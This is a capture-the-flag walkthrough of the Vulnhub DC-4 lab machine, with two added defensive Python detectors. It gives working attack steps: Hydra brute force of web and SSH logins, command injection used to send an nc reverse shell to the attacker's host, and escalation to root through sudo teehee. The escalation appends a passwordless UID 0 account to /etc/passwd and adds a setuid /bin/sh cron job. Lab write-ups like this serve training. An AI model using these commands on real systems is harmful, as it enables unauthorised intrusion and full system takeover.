
【Vulnhub】— DC-4

Host discovery

Running netdiscover on Kali finds the target machine at 192.168.234.179.

Port scanning

Scan it with Nmap using nmap -sV -A 192.168.234.179 --script=vuln:

root@kali:~# nmap -sV -A 192.168.234.179 --script=vuln
Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-11 19:40 CST
Pre-scan script results:
| broadcast-avahi-dos: 
|   Discovered hosts:
|     224.0.0.251
|   After NULL UDP avahi packet DoS (CVE-2011-1002).
|_  Hosts are all up (not vulnerable).
Nmap scan report for 192.168.234.179
Host is up (0.00037s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
80/tcp open  http    nginx 1.15.10
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| http-csrf: 
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.234.179
|   Found the following possible CSRF vulnerabilities: 
|     
|     Path: http://192.168.234.179:80/
|     Form id: 
|     Form action: login.php
|     
|     Path: http://192.168.234.179:80/login.php
|     Form id: 
|_    Form action: login.php
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-server-header: nginx/1.15.10
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
MAC Address: 00:0C:29:B1:DD:47 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.37 ms 192.168.234.179

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 104.88 seconds

The scan shows that the target has ports 80 and 22 open.

Let's visit port 80 first and take a look at the web service.

The site is very clean, with nothing else on the page, which brings two approaches to mind:

1. Brute force

2. Directory scanning

Directory scanning with the dirsearch script found nothing useful.

$ python dirsearch.py -u http://192.168.234.179/ -e *

 _|. _ _  _  _  _ _|_    v0.3.8
(_||| _) (/_(_|| (_| )

Extensions: * | HTTP method: get | Threads: 10 | Wordlist size: 6104

Error Log: H:\工具\dirsearch-master\logs\errors-20-02-11_19-50-11.log

Target: http://192.168.234.179/

[19:50:11] Starting:
[19:50:11] 400 -  158B  - /%2e%2e/google.com
[19:50:18] 302 -  704B  - /command.php  ->  index.php
[19:50:18] 301 -  170B  - /css  ->  http://192.168.234.179/css/
[19:50:21] 301 -  170B  - /images  ->  http://192.168.234.179/images/
[19:50:21] 200 -  506B  - /index.php
[19:50:21] 403 -   15B  - /INDEX.PHP
[19:50:21] 403 -   15B  - /index.PHP
[19:50:22] 302 -  206B  - /login.php  ->  index.php

Task Completed

Brute force

That leaves brute force. Judging from the page content, the username is probably admin.

Use Hydra to crack it; here I used xHydra, Hydra's graphical front end.

The wordlist is /usr/share/wordlists/rockyou.txt.

If this is the first time using this wordlist, decompress the archive first with gunzip rockyou.txt.gz.

The target URL goes here; the part after the first colon is the fixed format of the POST body, with ^USER^ and ^PASS^ replaced by each candidate, and the final S=logout field tells Hydra that a response containing "logout" means a successful login.

/login.php:username=^USER^&password=^PASS^:S=logout

Finally we get the password:

Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-02-11 20:11:43
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking http-post-form://192.168.234.179:80/login.php:username=^USER^&password=^PASS^:S=logout
[80][http-post-form] host: 192.168.234.179   login: admin   password: happy
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-02-11 20:11:55
<finished>

Log in with admin:happy.
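A defender's counterpart to the brute-force step above, added here as an example (it is not part of the original write-up): the script parses nginx access-log lines and flags any client that POSTs to /login.php at least a threshold number of times inside a sliding 60-second window, which is the server-side footprint of the Hydra http-post-form run. The log lines are constructed for the example; the client addresses and timestamps are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# nginx "combined" log format: client, ident, user, [timestamp], "request", status, size, ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)'
)

def parse_line(line):
    """Parse one access-log line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return rec

def find_login_bursts(lines, path="/login.php", window=timedelta(seconds=60), threshold=10):
    """Return {client_ip: count} for every client that POSTs to `path` at least
    `threshold` times inside some sliding interval of length `window`."""
    by_ip = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec and rec["method"] == "POST" and rec["path"] == path:
            by_ip[rec["ip"]].append(rec["ts"])
    flagged = {}
    for ip, times in by_ip.items():
        times.sort()
        start, best = 0, 0
        for end, t in enumerate(times):
            while t - times[start] > window:   # slide the window's left edge forward
                start += 1
            best = max(best, end - start + 1)
        if best >= threshold:
            flagged[ip] = best
    return flagged

# Constructed sample log (not from the page): one client fires 30 login POSTs in about
# 12 seconds, as a Hydra http-post-form run looks from the server; another logs in once by hand.
def _entry(ip, when, method="POST", path="/login.php", status=302, size=206):
    stamp = when.strftime("%d/%b/%Y:%H:%M:%S +0800")   # timezone literal is part of the sample
    return f'{ip} - - [{stamp}] "{method} {path} HTTP/1.1" {status} {size} "-" "Mozilla/5.0"'

_t0 = datetime(2020, 2, 11, 20, 11, 43)
SAMPLE_LOG = [_entry("192.168.234.151", _t0 + timedelta(milliseconds=400 * i)) for i in range(30)]
SAMPLE_LOG.append(_entry("192.168.234.1", _t0 + timedelta(minutes=3), "GET", "/index.php", 200, 506))
SAMPLE_LOG.append(_entry("192.168.234.1", _t0 + timedelta(minutes=3, seconds=20)))
```

Calling find_login_bursts(SAMPLE_LOG) returns {'192.168.234.151': 30}; on a live server the same function would be fed the tail of the access log.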

Command execution

It looks like there is command execution here.

You are currently logged in
Run Command:
· List Files
· Disk Usage
· Disk Free

You have selected: ls -l
total 24
-rw-r--r-- 1 root root 1783 Apr  5  2019 command.php
drwxr-xr-x 2 root root 4096 Mar 24  2019 css
drwxr-xr-x 2 root root 4096 Mar 24  2019 images
-rw-r--r-- 1 root root  506 Apr  6  2019 index.php
-rw-r--r-- 1 root root 1473 Apr  7  2019 login.php
-rw-r--r-- 1 root root  663 Mar 24  2019 logout.php

Commands really can be executed here.

Since it is a Linux system, think of a way to execute the command we need and get a reverse shell. (Heh, Burp!)

It executed successfully.

Now for the reverse shell!!!

Reverse shell

First start a listener on Kali: nc -lvp 7777

In Burp, send the command nc 192.168.234.151 7777 -e /bin/bash

Use python -c 'import pty;pty.spawn("/bin/bash")' to get an interactive shell.

Check privileges

www-data@dc-4:/usr/share/nginx/html$ whoami
whoami
www-data

Go to the /home directory:

www-data@dc-4:/home$ ls
ls
charles  jim  sam
www-data@dc-4:/home$ cd jim
cd jim
www-data@dc-4:/home/jim$ ls
ls
backups  mbox  test.sh
www-data@dc-4:/home/jim$ cat test.sh
cat test.sh
#!/bin/bash
for i in {1..5}
do
 sleep 1
 echo "Learn bash they said."
 sleep 1
 echo "Bash is good they said."
done
 echo "But I'd rather bash my head against a brick wall."

There should be information for three accounts, but only jim's directory has anything in it. Let's look at backups.

www-data@dc-4:/home/jim$ cd bac	
cd backups/
www-data@dc-4:/home/jim/backups$ ls
ls
old-passwords.bak
www-data@dc-4:/home/jim/backups$ cat old-passwords.bak
cat old-passwords.bak
000000
12345
iloveyou
1q2w3e4r5t
1234
123456a
qwertyuiop
monkey
123321
……
……

These are probably jim's old passwords, so use Hydra to crack the account.

root@kali:~# hydra -l jim -P passwd.txt -t 50 192.168.234.179 ssh
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-02-11 21:24:33
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 50 tasks per 1 server, overall 50 tasks, 253 login tries (l:1/p:253), ~6 tries per task
[DATA] attacking ssh://192.168.234.179:22/
[22][ssh] host: 192.168.234.179   login: jim   password: jibril04
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 47 final worker threads did not complete until end.
[ERROR] 47 targets did not resolve or could not be connected
[ERROR] 0 targets did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-02-11 21:24:42

The password is jibril04.

SSH login

ssh -p 22 jim@192.168.234.179

Check mbox

jim@dc-4:/$ cd /home/jim
jim@dc-4:~$ ls
backups  mbox  test.sh
jim@dc-4:~$ cat mbox
From root@dc-4 Sat Apr 06 20:20:04 2019
Return-path: <root@dc-4>
Envelope-to: jim@dc-4
Delivery-date: Sat, 06 Apr 2019 20:20:04 +1000
Received: from root by dc-4 with local (Exim 4.89)
	(envelope-from <root@dc-4>)
	id 1hCiQe-0000gc-EC
	for jim@dc-4; Sat, 06 Apr 2019 20:20:04 +1000
To: jim@dc-4
Subject: Test
MIME-Version: 1.0
Content-Type: text/plain; charset="UTF-8"
Content-Transfer-Encoding: 8bit
Message-Id: <E1hCiQe-0000gc-EC@dc-4>
From: root <root@dc-4>
Date: Sat, 06 Apr 2019 20:20:04 +1000
Status: RO

This is a test.

It is an email from root.

On Linux, mail is stored in /var/mail.

jim@dc-4:~$ cd /var
jim@dc-4:/var$ ls
backups  cache  lib  local  lock  log  mail  opt  run  spool  tmp  www
jim@dc-4:/var$ cd mail
jim@dc-4:/var/mail$ ls
jim
jim@dc-4:/var/mail$ cat jim
From charles@dc-4 Sat Apr 06 21:15:46 2019
Return-path: <charles@dc-4>
Envelope-to: jim@dc-4
Delivery-date: Sat, 06 Apr 2019 21:15:46 +1000
Received: from charles by dc-4 with local (Exim 4.89)
	(envelope-from <charles@dc-4>)
	id 1hCjIX-0000kO-Qt
	for jim@dc-4; Sat, 06 Apr 2019 21:15:45 +1000
To: jim@dc-4
Subject: Holidays
MIME-Version: 1.0
Content-Type: text/plain; charset="UTF-8"
Content-Transfer-Encoding: 8bit
Message-Id: <E1hCjIX-0000kO-Qt@dc-4>
From: Charles <charles@dc-4>
Date: Sat, 06 Apr 2019 21:15:45 +1000
Status: O

Hi Jim,

I'm heading off on holidays at the end of today, so the boss asked me to give you my password just in case anything goes wrong.

Password is:  ^xHhA&hvim0y

See ya,
Charles

We have Charles's password, so switch user.

jim@dc-4:/var/mail$ su charles
Password: 
charles@dc-4:/var/mail$ 

Use sudo -l to check sudo privileges.

It shows that teehee can be run with sudo without the root password.

I wasn't sure how to use teehee, so I searched Baidu.

So I picked up two privilege escalation methods from the experts' write-ups.

Privilege escalation

Method 1

Modify the passwd file and append a user with root privileges.

echo "hackergu::0:0:::/bin/bash" | sudo teehee -a /etc/passwd

Field explanation:

e.g. admin:x:0:0::/home/admin:/bin/bash

[username]:[password]:[UID]:[GID]:[description]:[home directory]:[login shell]

In the appended line the password field is empty, so no password is asked for, and UID 0 makes the account root. Privilege escalation now succeeds:

root@dc-4:/# cd /root
root@dc-4:/root# ls
flag.txt
root@dc-4:/root# cat flag.txt



888       888          888 888      8888888b.                             888 888 888 888 
888   o   888          888 888      888  "Y88b                            888 888 888 888 
888  d8b  888          888 888      888    888                            888 888 888 888 
888 d888b 888  .d88b.  888 888      888    888  .d88b.  88888b.   .d88b.  888 888 888 888 
888d88888b888 d8P  Y8b 888 888      888    888 d88""88b 888 "88b d8P  Y8b 888 888 888 888 
88888P Y88888 88888888 888 888      888    888 888  888 888  888 88888888 Y8P Y8P Y8P Y8P 
8888P   Y8888 Y8b.     888 888      888  .d88P Y88..88P 888  888 Y8b.      "   "   "   "  
888P     Y888  "Y8888  888 888      8888888P"   "Y88P"  888  888  "Y8888  888 888 888 888 


Congratulations!!!

Hope you enjoyed DC-4.  Just wanted to send a big thanks out there to all those
who have provided feedback, and who have taken time to complete these little
challenges.

If you enjoyed this CTF, send me a tweet via @DCAU7.

Method 2

Privilege escalation via a cron job

echo "* * * * * root chmod 4777 /bin/sh" | sudo teehee -a /etc/crontab

Writing * in all five time fields means the job runs every minute.

Changing the mode of /bin/sh to 4777 (setuid, world-executable) lets a non-root user run it with root privileges while it runs. Note that /bin/sh here is a symlink to dash, and chmod follows the symlink, so it is dash that becomes setuid.

charles@dc-4:/$ echo "* * * * * root chmod 4777 /bin/sh" | sudo teehee -a /etc/crontab
* * * * * root chmod 4777 /bin/sh
charles@dc-4:/$ ls -l /bin/sh
lrwxrwxrwx 1 root root 4 Jan 24  2017 /bin/sh -> dash
charles@dc-4:/$ /bin/sh
# whoami
root
# cd /root
# ls
flag.txt
# cat flag.txt



888       888          888 888      8888888b.                             888 888 888 888 
888   o   888          888 888      888  "Y88b                            888 888 888 888 
888  d8b  888          888 888      888    888                            888 888 888 888 
888 d888b 888  .d88b.  888 888      888    888  .d88b.  88888b.   .d88b.  888 888 888 888 
888d88888b888 d8P  Y8b 888 888      888    888 d88""88b 888 "88b d8P  Y8b 888 888 888 888 
88888P Y88888 88888888 888 888      888    888 888  888 888  888 88888888 Y8P Y8P Y8P Y8P 
8888P   Y8888 Y8b.     888 888      888  .d88P Y88..88P 888  888 Y8b.      "   "   "   "  
888P     Y888  "Y8888  888 888      8888888P"   "Y88P"  888  888  "Y8888  888 888 888 888 


Congratulations!!!

Hope you enjoyed DC-4.  Just wanted to send a big thanks out there to all those
who have provided feedback, and who have taken time to complete these little
challenges.

If you enjoyed this CTF, send me a tweet via @DCAU7.
# 
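An added example, not from the write-up or its references, that audits for the artifacts the two methods above leave behind: a non-root UID 0 entry with an empty password field in /etc/passwd, and a crontab job whose command sets the setuid bit. The sample file contents are constructed; only the two appended lines are taken from the write-up, and the jim/charles UIDs are assumptions.

```python
import re

def extra_root_accounts(passwd_text):
    """Audit /etc/passwd content: report any non-root entry with UID 0 and any
    entry whose password field is empty (which lets the account log in with no password)."""
    findings = []
    for lineno, line in enumerate(passwd_text.splitlines(), 1):
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            findings.append((lineno, line, "malformed entry (expected 7 fields)"))
            continue
        name, pw, uid, gid, gecos, home, shell = fields
        if uid == "0" and name != "root":
            findings.append((lineno, name, "UID 0 account that is not root"))
        if pw == "":
            findings.append((lineno, name, "empty password field"))
    return findings

# chmod with a numeric mode whose leading digit sets setuid (4), setgid (2) or both (6), or a symbolic '+s'
SETUID_CHMOD = re.compile(r"\bchmod\s+(?:[ugoa]*\+[rwxX]*s|[2-7][0-7]{3}\b)")

def setuid_cron_entries(crontab_text):
    """Audit /etc/crontab content: return (line number, line) for every job whose
    command makes a file setuid/setgid, regardless of the schedule or user field."""
    hits = []
    for lineno, line in enumerate(crontab_text.splitlines(), 1):
        stripped = line.strip()
        if not stripped or stripped.startswith("#") or "=" in stripped.split()[0]:
            continue   # blank line, comment, or a variable assignment such as SHELL=/bin/sh
        if SETUID_CHMOD.search(stripped):
            hits.append((lineno, stripped))
    return hits

# Constructed samples: the last line of each is the line the write-up appends; the other
# entries (and the jim/charles UIDs) are made up for the example.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
jim:x:1001:1001:Jim,,,:/home/jim:/bin/bash
charles:x:1002:1002:Charles,,,:/home/charles:/bin/bash
hackergu::0:0:::/bin/bash
"""
SAMPLE_CRONTAB = """\
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
17 * * * * root cd / && run-parts --report /etc/cron.hourly
* * * * * root chmod 4777 /bin/sh
"""
```

On a real host, read /etc/passwd and /etc/crontab into the two functions; a scheduled diff of their output against a known-good baseline catches both methods within the minute the cron job would need to fire.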

 

References:

https://blog.csdn.net/leesir98/article/details/101620077

https://www.jianshu.com/p/ac10a4149eef

 
